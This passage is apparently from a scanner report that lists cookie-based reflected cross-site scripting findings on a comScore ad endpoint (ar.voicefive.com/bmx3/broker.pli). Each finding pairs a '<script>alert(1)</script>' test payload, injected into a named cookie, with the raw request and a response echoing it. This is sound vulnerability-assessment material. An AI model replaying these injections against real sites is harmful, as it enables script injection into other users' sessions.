p=Sat Sep 17 14:04:38 2011&recExp=Sat Sep 17 14:04:38 2011&prad=65659550&arc=42804711&', "ar_p107223597": 'exp=1&initExp=Thu Sep 1 03:23:36 2011&recExp=Thu Sep 1 03:23:36 2011&prad=74127&arc=452367&d1b6c<script>alert(1)</script>da4afe07d09', "89dd482454781ab5297ad107": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133
...[SNIP]...

5.76. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p108883753 cookie is copied into the HTML document as plain text between tags. The payload 8f90f<script>alert(1)</script>d84fff57e96 was submitted in the ar_p108883753 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&8f90f<script>alert(1)</script>d84fff57e96; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:04:51 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:51 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:51 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30531

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
1&', "BMX_G"": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p108883753": 'exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&8f90f<script>alert(1)</script>d84fff57e96', "ar_p1088837538f683
b27e0f2581a": 'exp=1&initExp=Sat Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=2&initExp=Sun Sep 4 12:13:34 2011&rec
...[SNIP]...

5.77. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p109848095 cookie is copied into the HTML document as plain text between tags. The payload a14a6<script>alert(1)</script>65fcfcc7ab5 was submitted in the ar_p109848095 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&a14a6<script>alert(1)</script>65fcfcc7ab5; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=118&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:28 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29438

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
41&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&a14a6<script>alert(1)</script>65fcfcc7ab5', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282]]>
...[SNIP]...

5.78. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p110620504 cookie is copied into the HTML document as plain text between tags. The payload caf23<script>alert(1)</script>3b4408060ca was submitted in the ar_p110620504 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&caf23<script>alert(1)</script>3b4408060ca; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=97&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:24 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29437

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
ep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&caf23<script>alert(1)</script>3b4408060ca', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&',
...[SNIP]...

5.79. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p63514475 cookie is copied into the HTML document as plain text between tags. The payload f5a43<script>alert(1)</script>513c514c979 was submitted in the ar_p63514475 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f5a43<script>alert(1)</script>513c514c979; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=104&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:25 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29438

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
3:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&f5a43<script>alert(1)</script>513c514c979' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|www.PetNamesWorld.com|www.BigGreenHelp.com|www.HotelForDogsMovie.com|www.MundoNick.com|www.iCarly.com|www.MundoBob.com|www
...[SNIP]...

5.80. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 3caa2<script>alert(1)</script>08c614493d4 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&3caa2<script>alert(1)</script>08c614493d4; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=90&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:23 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29437

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
:09:06 2011&recExp=Sat Sep 17 13:09:06 2011&prad=65659550&arc=42804711&', "ar_p81479006": 'exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&3caa2<script>alert(1)</script>08c614493d4', "ar_p63514475": 'exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "www.Doralinks.com|w
...[SNIP]...

5.81. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload b4df0<script>alert(1)</script>c5e1b9b1385 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&b4df0<script>alert(1)</script>c5e1b9b1385; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=83&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:21 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29437

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
t Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p82806590": 'exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&b4df0<script>alert(1)</script>c5e1b9b1385', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C'
...[SNIP]...

5.82. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload a52da<script>alert(1)</script>0e18f0dae67 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&a52da<script>alert(1)</script>0e18f0dae67; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 13:09:20 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p108883753=exp=76&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:20 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29437

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C
...[SNIP]...
